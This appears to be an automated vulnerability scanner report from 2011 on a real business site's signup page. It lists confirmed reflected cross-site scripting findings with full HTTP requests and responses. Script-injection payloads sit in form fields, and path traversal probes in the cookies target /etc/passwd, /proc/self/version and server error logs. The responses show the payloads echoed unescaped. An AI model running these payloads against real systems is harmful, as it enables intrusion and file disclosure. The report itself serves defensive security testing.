'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x00133F)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST '"--></style></script><script>alert(0x001350)</script>
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 289
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001350)%3c%2fscript%3e&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D8BF56E508353A49397B922AEB4A1ADF; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="'"--></style></script><script>netsparker(0x00135..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x00134B)</script>
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00134B)%3c%2fscript%3e&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
